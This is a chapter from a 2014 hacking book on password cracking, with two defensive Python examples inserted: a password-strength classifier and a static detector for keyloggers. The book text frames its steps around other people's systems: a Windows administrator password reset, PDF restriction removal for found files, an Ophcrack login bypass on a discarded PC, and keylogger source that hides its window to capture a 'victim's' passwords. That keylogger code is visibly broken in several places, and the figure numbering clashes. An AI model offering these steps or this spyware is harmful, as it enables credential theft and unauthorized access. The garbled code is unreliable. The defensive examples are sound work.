Cracking passwords - A Hacker's Life Starter: Security Penetration Anywhere & Anytime (2014)


Chapter 4. Cracking passwords

We will cover:

* Types of passwords

* Basic administrator password reset

* Cracking the encrypted PDF

* Bypassing the Windows password

* Custom-made keylogger

Password cracking doesn't have to involve fancy tools, but it is a fairly tedious process. If the target doesn't lock you out after a specific number of tries, you can spend an unlimited amount of time trying every combination of alphanumeric characters. It's just a question of time and bandwidth before you break into a system.

Types of passwords

Dictionary - A file of words is run against user accounts, and if the password is a simple word, it can be found pretty quickly.

Hybrid - A common method users employ when changing passwords is to add a number or symbol to the end. A hybrid attack works like a dictionary attack, but adds simple numbers or symbols to each password attempt.

Brute force - The most time-consuming, but most comprehensive, way to crack a password. Every combination of characters is tried until the password is broken.
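
The same three categories can be applied defensively when a password is being set. The following is an added example, not code from the book: it reports which of the three attacks would reach a candidate password first and roughly how large that search space is. The wordlist, the 42-symbol suffix alphabet and the 60-bit threshold are assumptions chosen for illustration.

```python
import math
import re
import string

# Constructed sample wordlist; a real check would load a much larger list.
WORDLIST = {"password", "dragon", "letmein", "summer", "welcome"}

# Hybrid shape described above: a word followed by a few digits or symbols.
_SUFFIX = re.compile(r"^(?P<stem>[A-Za-z]+)(?P<tail>[\d\W_]{1,4})$")


def charset_size(pw):
    """Size of the alphabet a brute-force search would have to cover."""
    size = 0
    if any(c in string.ascii_lowercase for c in pw):
        size += 26
    if any(c in string.ascii_uppercase for c in pw):
        size += 26
    if any(c in string.digits for c in pw):
        size += 10
    if any(c in string.punctuation for c in pw):
        size += len(string.punctuation)  # 32 symbols
    return size or 1  # avoids log2(0) for empty or unusual input


def classify(pw):
    """Return (weakest_attack, search_space_bits) for a candidate password."""
    if pw.lower() in WORDLIST:
        return "dictionary", math.log2(len(WORDLIST))
    m = _SUFFIX.match(pw)
    if m and m.group("stem").lower() in WORDLIST:
        # Every word combined with every tail of 1..n characters drawn
        # from digits plus punctuation (assumed 42 symbols).
        tails = sum(42 ** k for k in range(1, len(m.group("tail")) + 1))
        return "hybrid", math.log2(len(WORDLIST) * tails)
    return "brute force", len(pw) * math.log2(charset_size(pw))


def acceptable(pw, min_bits=60):
    """Accept only passwords that force a large brute-force search."""
    attack, bits = classify(pw)
    return attack == "brute force" and bits >= min_bits
```

With this wordlist, "Summer14!" falls to the hybrid search in under 19 bits of work, while a random 12-character password drawn from all four character classes needs about 78 bits.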

Basic administrator password reset

1. Go to Start, open Run, and type cmd. Alternatively, open Start, search for Command Prompt, and press Enter.

2. To view the available users inside the operating system (see Figure 4-1), type:

net user

Figure 4-1 shows the users on the computer, as listed in cmd.

3. Now type:

net user Administrator *

This is net user again, followed by the name of the administrator account, which this time is Administrator.

4. Then type the new password twice. After that, you should be able to log in to the administrator account with the new password.

Cracking the encrypted PDF

Removing passwords from PDF files can sometimes be frustrating, especially when you have lost a password or you found the file free somewhere. A-PDF Restrictions Remover is a great tool for cracking the password. It is free to download and can be found with Google if you enter the exact name (see Figure 4-2).

Figure 4-2 shows how A-PDF Restrictions Remover looks when it is running.

1. Once you have downloaded and installed A-PDF Restrictions Remover, you should be able to right-click the restricted PDF file and choose “Remove Restrictions” or “Remove Restriction & Save as..”

Bypass Windows password

Bypassing the Windows password has become one of the most common tasks in the IT industry and in everyday life, perhaps because you lost your password, or because you found the PC thrown away in the street and need the password to use the computer.

Here I will show you a way to bypass the Windows password using a USB stick or CD.

1. Go to http://ophcrack.sourceforge.net/download.php, download the ophcrack LiveCD, and burn the ISO.

2. Reboot the computer, boot it from the CD, and choose Ophcrack LiveCD Graphics mode (automode) (see Figure 4-2).

Figure 4-2 shows Ophcrack LiveCD running from the CD or stick.

3. When it has loaded and opened, it will ask you which partition to open. Type 0.

4. Wait a moment and the cracked password will appear next to the protected user (see Figure 4-3).

Figure 4-3 shows how backtrack will look while searching for packets.

Custom Made Keylogger

A keylogger doesn’t actually crack a password, but it monitors the passwords the victim is typing. Let’s see how to program a keylogger.

1. Start by navigating to python.org. In the download section, download the latest version of Python (see Figure 5-8).

Figure 5-8 shows how the script runs in the terminal.

2. Once it has finished downloading, go to: http://sourceforge.net/projects/pyhook/files/

Download the latest version and install it.

3. Now navigate to www.sourceforge.net/projects/pywin32, download it, and install it.

Note: All of these tools need to be the same version in order to work properly. pyHook 1.5x requires Python 2.7.

4. Now launch IDLE (Python GUI) by searching for the name in Start, and the Python shell will launch.

5. Type the following Python code into the app:

import win32api

import win32console

import win32gui

import pythoncom, pyHook

win = win32console.GetConsoleWindow()

win32gui.ShowWindows(win,0)

def OnKeyboardEvent(event):

if event.Ascii==5:

_exit(1)

if event.Ascii != 0 or 8:

f=open(‘c:\output.txt’,’w’)

buffer=f.read()

f.close()

f=open(‘c:\output.txt’,’w’)

keylogs=chr(event.Ascii)

if event.Ascii==13:

keylogs=’/n’

buffer += keylogs

f.write(buffer)

f.close()

hm = pyHook.HookManager()

hm.KeyDown = OnKeyboardEvent

hm.HookKeyboard()

pythoncom.PumpMessages()

6. Save the file as my_own_keylogger.py and launch it.

7. Now that your own software is running, you can start testing it by going to your email account or any other account and entering your username and password.

8. When you think you have enough information, press Ctrl+I to stop the app.

9. Go to the output.txt file and examine it to see what you retrieved.

Note: In our case we saved output.txt in the root folder of the C drive.
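
From the defender's side, the script above has a recognisable shape: a global keyboard hook, a hidden console window, a message pump and a file write, all in one program. The following is an added example, not code from the book: a static triage check that scores Python source for that combination. The indicator weights and the threshold are assumptions, and the sample inputs are constructed.

```python
import ast
import re

# Indicators taken from the script on this page; the weights are assumptions.
INDICATORS = {
    "keyboard_hook": ({"HookKeyboard", "HookManager"}, 3),
    "hidden_window": ({"GetConsoleWindow", "ShowWindow"}, 2),
    "message_pump": ({"PumpMessages"}, 1),
    "file_write": ({"open", "write"}, 1),
}

# Constructed samples: a hook-and-hide skeleton and an ordinary file writer.
SAMPLE_SUSPECT = """
import pyHook, pythoncom, win32console, win32gui
win32gui.ShowWindow(win32console.GetConsoleWindow(), 0)
hm = pyHook.HookManager()
hm.HookKeyboard()
pythoncom.PumpMessages()
"""
SAMPLE_BENIGN = 'f = open("notes.txt", "w")\nf.write("hello")\nf.close()\n'


def names_used(source):
    """Collect the name of every function or method called in the source."""
    try:
        tree = ast.parse(source)
    except SyntaxError:
        # Python 2 or damaged source: fall back to a plain token scan.
        return set(re.findall(r"([A-Za-z_]\w*)\s*\(", source))
    found = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            f = node.func
            found.add(f.attr if isinstance(f, ast.Attribute) else getattr(f, "id", ""))
    return found


def triage(source, threshold=5):
    """Return (score, matched_indicators, flagged) for one source file."""
    used = names_used(source)
    hits = sorted(k for k, (names, _) in INDICATORS.items() if names & used)
    score = sum(INDICATORS[k][1] for k in hits)
    # A keyboard hook alone (e.g. a hotkey tool) is not enough to flag.
    return score, hits, score >= threshold and "keyboard_hook" in hits
```

A visible hotkey utility that hooks the keyboard and pumps messages scores 4 and is not flagged; adding the hidden console window pushes the score over the threshold.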

Small summary ahead

* A-PDF Restrictions Remover is a tool for cracking the password of a PDF

* Ophcrack is the best software for bypassing the Windows password

* There are three types of password cracking: Dictionary, Hybrid, Brute Force.

* A keylogger can be custom made using Python